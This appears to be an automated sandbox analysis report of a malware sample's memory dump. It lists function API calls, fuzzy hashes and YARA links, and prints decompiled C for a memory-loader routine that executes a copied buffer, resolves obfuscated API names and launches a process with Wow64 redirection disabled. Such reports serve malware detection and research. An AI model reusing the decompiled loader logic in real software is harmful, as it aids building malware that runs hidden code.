Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1438
Part of subcall function 00DC140D: lstrlen.KERNEL32(00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1440
Part of subcall function 00DC140D: strcpy.NTDLL ref: 00DC1457
Part of subcall function 00DC140D: lstrcat.KERNEL32(00000000,00000000), ref: 00DC1462
Part of subcall function 00DC140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DC147F

StrTrimA.SHLWAPI(00000000,00DCC2C4,?,05119630), ref: 00DC3E90

Part of subcall function 00DC74AF: lstrlen.KERNEL32(0511887A,00000000,00000000,00000000,00DC6CA0,00000000), ref: 00DC74BF
Part of subcall function 00DC74AF: lstrlen.KERNEL32(?), ref: 00DC74C7
Part of subcall function 00DC74AF: lstrcpy.KERNEL32(00000000,0511887A), ref: 00DC74DB
Part of subcall function 00DC74AF: lstrcat.KERNEL32(00000000,?), ref: 00DC74E6

lstrcpy.KERNEL32(00000000,?), ref: 00DC3EB0
lstrcat.KERNEL32(00000000,?), ref: 00DC3EC2
lstrcat.KERNEL32(00000000,00000000), ref: 00DC3EC8

Part of subcall function 00DC745D: lstrlen.KERNEL32(?,00DCD2E0,74B47FC0,00000000,00DC534B,?,?,?,?,?,00DC70B5,?), ref: 00DC7466
Part of subcall function 00DC745D: mbstowcs.NTDLL ref: 00DC748D
Part of subcall function 00DC745D: memset.NTDLL ref: 00DC749F

wcstombs.NTDLL ref: 00DC3F5B

Part of subcall function 00DC492B: SysAllocString.OLEAUT32(00000000), ref: 00DC496C

Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D

HeapFree.KERNEL32(00000000,?,00000000), ref: 00DC3F9C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DC3FAC
HeapFree.KERNEL32(00000000,00000000,?,05119630), ref: 00DC3FBC
HeapFree.KERNEL32(00000000,?), ref: 00DC3FCC
HeapFree.KERNEL32(00000000,?), ref: 00DC3FDA

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 972889839-0
Opcode ID: 21a3913c6a444d72c22e890f096181bf00a04958e437219562beb6109164e6e6
Instruction ID: 5e940f653c095a79a9d2f0ee5487d17983143718a47eaf81a711d1cb045b3b83
Opcode Fuzzy Hash: 21a3913c6a444d72c22e890f096181bf00a04958e437219562beb6109164e6e6
Instruction Fuzzy Hash: A9A1F77191020BAFCB119F68DC89FAA7BB9FF49354B184429F909C7260DB31D951DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 702A3283, Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 702A32F2
_free.LIBCMT ref: 702A3308
_free.LIBCMT ref: 702A331B
_free.LIBCMT ref: 702A3330
_free.LIBCMT ref: 702A3345
GetCPInfo.KERNEL32(?,?), ref: 702A338F

Part of subcall function 702A9232: _free.LIBCMT ref: 702A929D

_free.LIBCMT ref: 702A35FA
_free.LIBCMT ref: 702A360D
_free.LIBCMT ref: 702A361B
_free.LIBCMT ref: 702A3626
_free.LIBCMT ref: 702A3668
_free.LIBCMT ref: 702A3670
_free.LIBCMT ref: 702A3676
_free.LIBCMT ref: 702A367E
_free.LIBCMT ref: 702A368C

Strings

0*p, xrefs: 702A36B7

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$Info
String ID: 0*p
API String ID: 2509303402-2831513755
Opcode ID: fec43e712b177bbe5e42bb60310420ac3fd91d8988f5f96bcf7a7bab9112043d
Instruction ID: 531293be9d837879ee36bd5aa1cbc2ddb772c7262a094d8cd93b53f572aa5ab5
Opcode Fuzzy Hash: fec43e712b177bbe5e42bb60310420ac3fd91d8988f5f96bcf7a7bab9112043d
Instruction Fuzzy Hash: 8ED1ADB2D04306AFDB11CF68C881BAEBBB9BF48300F104569F996A7251DF74A855CF64

Uniqueness

Uniqueness Score: -1.00%

Function 702A2E40, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 702A2E84

Part of subcall function 702A36E1: _free.LIBCMT ref: 702A36FE
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3710
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3722
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3734
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3746
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A3758
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A376A
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A377C
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A378E
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37A0
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37B2
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37C4
Part of subcall function 702A36E1: _free.LIBCMT ref: 702A37D6

_free.LIBCMT ref: 702A2E79

Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7

_free.LIBCMT ref: 702A2E9B
_free.LIBCMT ref: 702A2EB0
_free.LIBCMT ref: 702A2EBB
_free.LIBCMT ref: 702A2EDD
_free.LIBCMT ref: 702A2EF0
_free.LIBCMT ref: 702A2EFE
_free.LIBCMT ref: 702A2F09
_free.LIBCMT ref: 702A2F41
_free.LIBCMT ref: 702A2F48
_free.LIBCMT ref: 702A2F65
_free.LIBCMT ref: 702A2F7D

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 725265803d70ce9de7f9ccaa37fb718376295833dc3174951b05eaf8910300b2
Instruction ID: 0a6ee0f0851a085b1535d80406234a9e46915580c517e701e31cc6f0310d373a
Opcode Fuzzy Hash: 725265803d70ce9de7f9ccaa37fb718376295833dc3174951b05eaf8910300b2
Instruction Fuzzy Hash: 24312F736046029FEB229E7CD945B4E73F9AF40310F206819F95AE6160DF71F8A48F29

Uniqueness

Uniqueness Score: -1.00%

Function 70296668, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 70296763
type_info::operator==.LIBVCRUNTIME ref: 7029678A
___TypeMatch.LIBVCRUNTIME ref: 70296896
CatchIt.LIBVCRUNTIME ref: 702968EB
IsInExceptionSpec.LIBVCRUNTIME ref: 70296971
_UnwindNestedFrames.LIBCMT ref: 702969F8
CallUnexpected.LIBVCRUNTIME ref: 70296A13

Strings

csm, xrefs: 70296710
csm, xrefs: 702967C1
csm, xrefs: 702966A3

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: be6524b8b20bfc424c502ecf97171aeeece15ffd2f624ce43f944caf998e50be
Instruction ID: 70ea993fb40c5041ddd289e08ca4dbd288c0fc197d688d6e677c58a0045537bf
Opcode Fuzzy Hash: be6524b8b20bfc424c502ecf97171aeeece15ffd2f624ce43f944caf998e50be
Instruction Fuzzy Hash: 2CC14B7292020A9FDF06CF94C889A9EBBF5BF04314F104159E8567B211D731EA61CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7E3F, Relevance: 15.1, APIs: 10, Instructions: 111
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00DC7E3F(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t42;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t52;
				void* _t60;
				intOrPtr* _t65;
				intOrPtr _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t39 = E00DC40AF(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
				_t42 = _v12(_v12);
				_v8 = _t42;
				if(_t42 == 0 && ( *0xdcd218 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t49 =  *0xdcd230; // 0x434a5a8
					_t18 = _t49 + 0xdce55b; // 0x73797325
					_t51 = E00DCA590(_t18);
					_v12 = _t51;
					if(_t51 == 0) {
						_v8 = 8;
					} else {
						_t52 =  *0xdcd230; // 0x434a5a8
						_t20 = _t52 + 0xdce73d; // 0x5118ce5
						_t21 = _t52 + 0xdce0af; // 0x4e52454b
						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t65 == 0) {
							_v8 = 0x7f;
						} else {
							_t71 = __imp__;
							_v108 = 0x44;
							 *_t71(0);
							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t71(1);
							if(_t60 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xdcd1f0, 0, _v12);
					}
				}
				_t74 = _v16;
				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
				E00DC4C31(_t74);
				goto L12;
			}

0x00dc7e48
0x00dc7e48
0x00dc7e56
0x00dc7e5f
0x00dc7e62
0x00dc7f77
0x00dc7f7e
0x00dc7f7e
0x00dc7e71
0x00dc7e7c
0x00dc7e81
0x00dc7e84
0x00dc7e99
0x00dc7e9f
0x00dc7ea0
0x00dc7ea3
0x00dc7ea9
0x00dc7eac
0x00dc7eb1
0x00dc7eb9
0x00dc7ec0
0x00dc7ec7
0x00dc7eca
0x00dc7f5e
0x00dc7ed0
0x00dc7ed0
0x00dc7ed5
0x00dc7edc
0x00dc7ef0
0x00dc7ef4
0x00dc7f45
0x00dc7ef6
0x00dc7ef6
0x00dc7efd
0x00dc7f04
0x00dc7f1c
0x00dc7f22
0x00dc7f26
0x00dc7f40
0x00dc7f28
0x00dc7f31
0x00dc7f36
0x00dc7f36
0x00dc7f26
0x00dc7f56
0x00dc7f56
0x00dc7eca
0x00dc7f65
0x00dc7f6e
0x00dc7f72
0x00000000

APIs

Part of subcall function 00DC40AF: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DC7E5B,?,?,?,?,00000000,00000000), ref: 00DC40D4
Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DC40F6
Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DC410C
Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DC4122
Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DC4138
Part of subcall function 00DC40AF: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DC414E

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 00DC7E71
memset.NTDLL ref: 00DC7EAC

Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00DC3592,73797325), ref: 00DCA5A1
Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DCA5BB

GetModuleHandleA.KERNEL32(4E52454B,05118CE5,73797325), ref: 00DC7EE3
GetProcAddress.KERNEL32(00000000), ref: 00DC7EEA
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DC7F04
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DC7F22
CloseHandle.KERNEL32(00000000), ref: 00DC7F31
CloseHandle.KERNEL32(?), ref: 00DC7F36
GetLastError.KERNEL32 ref: 00DC7F3A
HeapFree.KERNEL32(00000000,?), ref: 00DC7F56

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemcpymemset
String ID:
API String ID: 1222765985-0
Opcode ID: 72ae4e2db4d3fdfacb6070d2c8cd74f969b5562734c226995bdb7b3d0ae18053
Instruction ID: 48acf63f0414106d726768cb56508eb3eb40e66e04470a135b7e94ebc4e7d38e
Opcode Fuzzy Hash: 72ae4e2db4d3fdfacb6070d2c8cd74f969b5562734c226995bdb7b3d0ae18053
Instruction Fuzzy Hash: 2F411A7290521AFBCB119BA4DC88E9EBFB9EF08344F144469E205E7221D7719A45DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7D0C, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00DC7D0C(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xdcd2ec; // 0x5119c48
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00DC2FF4(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xdcc1cc;
				}
				_t44 = E00DC4D59(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00DC75C4(lstrlenW(0xdcead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xdcead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xdcd230; // 0x434a5a8
						_t73 =  *0xdcd11c; // 0xdcaac2
						_t18 = _t75 + 0xdcead8; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00DC75C4(lstrlenW(0xdcebf8) + _a8 + _t57 + _t58 + lstrlenW(0xdcebf8) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00DC4C31(_v16);
						} else {
							_t64 =  *0xdcd230; // 0x434a5a8
							_t31 = _t64 + 0xdcebf8; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00DC4C31(_v8);
				}
				return _v20;
			}

0x00dc7d0c
0x00dc7d14
0x00dc7d1a
0x00dc7d2a
0x00dc7d2d
0x00dc7d34
0x00dc7d37
0x00dc7d39
0x00dc7d39
0x00dc7d42
0x00dc7d49
0x00dc7d4c
0x00dc7d52
0x00dc7d5c
0x00dc7d65
0x00dc7d6c
0x00dc7d7a
0x00dc7d8c
0x00dc7d93
0x00dc7d96
0x00dc7d9f
0x00dc7da8
0x00dc7db1
0x00dc7dbf
0x00dc7dc7
0x00dc7dcc
0x00dc7dcf
0x00dc7dda
0x00dc7df1
0x00dc7df5
0x00dc7e28
0x00dc7df7
0x00dc7dfa
0x00dc7e02
0x00dc7e0d
0x00dc7e15
0x00dc7e1d
0x00dc7e21
0x00dc7e21
0x00dc7df5
0x00dc7e30
0x00dc7e35
0x00dc7e3c

APIs

GetTickCount.KERNEL32 ref: 00DC7D21
lstrlen.KERNEL32(00000000,80000002), ref: 00DC7D5C
lstrlen.KERNEL32(?), ref: 00DC7D65
lstrlen.KERNEL32(00000000), ref: 00DC7D6C
lstrlenW.KERNEL32(80000002), ref: 00DC7D7A
lstrlenW.KERNEL32(00DCEAD8), ref: 00DC7D83
lstrlen.KERNEL32(?), ref: 00DC7DC7
lstrlen.KERNEL32(?), ref: 00DC7DCF
lstrlenW.KERNEL32(?), ref: 00DC7DDA
lstrlenW.KERNEL32(00DCEBF8), ref: 00DC7DE3

Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: ddceeae3e1078a2148a290ce98dea91563b7b50d9a2999e270bad96d4288ca91
Instruction ID: de3f45e41f40d1a5bf6a15284a6c10e6f72f72134d069637e01dd4495bf46a6b
Opcode Fuzzy Hash: ddceeae3e1078a2148a290ce98dea91563b7b50d9a2999e270bad96d4288ca91
Instruction Fuzzy Hash: AC313A7690021BEFCF01AFA4CC45E9EBBB5FF48314B0540A9F914A7221DB359A15EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 7029CF94, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 7029CFAA

Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7

_free.LIBCMT ref: 7029CFB6
_free.LIBCMT ref: 7029CFC1
_free.LIBCMT ref: 7029CFCC
_free.LIBCMT ref: 7029CFD7
_free.LIBCMT ref: 7029CFE2
_free.LIBCMT ref: 7029CFED
_free.LIBCMT ref: 7029CFF8
_free.LIBCMT ref: 7029D003
_free.LIBCMT ref: 7029D011

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 423c60139bd66d4d713d67ed1c2370bf00428eb673624f5775bd2fcac4df0144
Instruction ID: d8d9b2fb19e77f8830e1fdf5dd1d77ffa605724b9a30c7f430ce9bfc0daa9014
Opcode Fuzzy Hash: 423c60139bd66d4d713d67ed1c2370bf00428eb673624f5775bd2fcac4df0144
Instruction Fuzzy Hash: 6921C677950108AFCB01EFA8C881EDE7BB9BF48240F5055A6F615AB130DB31EA64CF85

Uniqueness

Uniqueness Score: -1.00%

Function 702A3BFF, Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 702A3C6D
_free.LIBCMT ref: 702A3C79
_free.LIBCMT ref: 702A3DA2
_free.LIBCMT ref: 702A3DAD

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 845483eb680f3f87fa88fa152ca8004ecc9cbb33d16b4ee1516f88cca73e72ea
Instruction ID: 8a5a6c2eabb46a5b465be814a18a141f521d151dda7af361c8a755898f3a154e
Opcode Fuzzy Hash: 845483eb680f3f87fa88fa152ca8004ecc9cbb33d16b4ee1516f88cca73e72ea
Instruction Fuzzy Hash: 8361A8B3914705EFD711CF68C881B9EB7F9AB84720F20456AF956AB290EF70A9108F50

Uniqueness

Uniqueness Score: -1.00%

Function 7029EC12, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

_free.LIBCMT ref: 7029EF1F
_free.LIBCMT ref: 7029EF38
_free.LIBCMT ref: 7029EF76
_free.LIBCMT ref: 7029EF7F
_free.LIBCMT ref: 7029EF8B

Strings

C, xrefs: 7029ED6E

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 75e47d628c16c74756be2c07cb3859312018ad52e27fb237068dbb8c434aa4da
Instruction ID: c6e4928e7991fceffb451a2a6e9085c217e3ee6a6ce122f6618b1d9290542ebe
Opcode Fuzzy Hash: 75e47d628c16c74756be2c07cb3859312018ad52e27fb237068dbb8c434aa4da
Instruction Fuzzy Hash: 2BB13B7691521AAFDB25DF18C884B9DB7B5FF48314F2045EAE84AA7350D730AEA0CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00DC140D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00DC140D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xdcd230; // 0x434a5a8
				_t1 = _t9 + 0xdce61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00DC5680(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x5119631
					_t41 = E00DC75C4(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00DCA7A2(_t34, _t41, _a8);
						E00DC4C31(_t41);
						_t42 = E00DC8668(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00DC4C31(_t36);
							_t36 = _t42;
						}
						_t43 = E00DC71BA(_t36, _t33);
						if(_t43 != 0) {
							E00DC4C31(_t36);
							_t36 = _t43;
						}
					}
					E00DC4C31(_t28);
				}
				return _t36;
			}

0x00dc140d
0x00dc1410
0x00dc1411
0x00dc1419
0x00dc1420
0x00dc1427
0x00dc142b
0x00dc1431
0x00dc1438
0x00dc143d
0x00dc1445
0x00dc144f
0x00dc1453
0x00dc1457
0x00dc145d
0x00dc1462
0x00dc1472
0x00dc1474
0x00dc148b
0x00dc148f
0x00dc1492
0x00dc1497
0x00dc1497
0x00dc14a0
0x00dc14a4
0x00dc14a7
0x00dc14ac
0x00dc14ac
0x00dc14a4
0x00dc14af
0x00dc14af
0x00dc14ba

APIs

Part of subcall function 00DC5680: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DC1427,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79), ref: 00DC56E7
Part of subcall function 00DC5680: sprintf.NTDLL ref: 00DC5708

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1438
lstrlen.KERNEL32(00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC1440

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

strcpy.NTDLL ref: 00DC1457
lstrcat.KERNEL32(00000000,00000000), ref: 00DC1462

Part of subcall function 00DCA7A2: lstrlen.KERNEL32(00000000,00000000,00DC6C79,00DC6C79,00000001,00000000,00000000,?,00DC1471,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DCA7B9

Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DC6C79,?,00000000,00DC6C79,00000000,05119630), ref: 00DC147F

Part of subcall function 00DC8668: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00DC148B,00000000,?,00000000,00DC6C79,00000000,05119630), ref: 00DC8672
Part of subcall function 00DC8668: _snprintf.NTDLL ref: 00DC86D0

Strings

=, xrefs: 00DC1479

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: a6a110a8516a0c8addfbb4b38aa62b8fd6cbbbe0fb950af64b446d77aac323cd
Instruction ID: 687522125e117e6919fd60169c341f5acc60cbdda2bce680d7d1861a70bbbd05
Opcode Fuzzy Hash: a6a110a8516a0c8addfbb4b38aa62b8fd6cbbbe0fb950af64b446d77aac323cd
Instruction Fuzzy Hash: CC11A37390162B7B4B126BB49C95EAF76ADDE45760319401DF904E7212DE34CD0297F4

Uniqueness

Uniqueness Score: -1.00%

Function 702A40C2, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 702A3E0E: _free.LIBCMT ref: 702A3E33

_free.LIBCMT ref: 702A4110

Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7

_free.LIBCMT ref: 702A411B
_free.LIBCMT ref: 702A4126
_free.LIBCMT ref: 702A417A
_free.LIBCMT ref: 702A4185
_free.LIBCMT ref: 702A4190
_free.LIBCMT ref: 702A419B

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1ffe04ccff681ada3d54081bbd60d47f136a62837b1005a29c952738c47488dc
Instruction ID: cd487928bcd06d6d4cb831093ed7e87dd547277df6137790fd5508d6a0b61bc9
Opcode Fuzzy Hash: 1ffe04ccff681ada3d54081bbd60d47f136a62837b1005a29c952738c47488dc
Instruction Fuzzy Hash: 451181B3584B04AED621ABB1DD07FCF7B9C5F81700F401825BA9AA6060DF74F5248FA5

Uniqueness

Uniqueness Score: -1.00%

Function 702A5936, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 702A597E
__fassign.LIBCMT ref: 702A5B5D
__fassign.LIBCMT ref: 702A5B7A
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 702A5BC2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 702A5C02
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 702A5CAE

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 1d33067ae97979da6a929c1dcbdf6e5f33510b9c75bd3dded1351bcb088efd2b
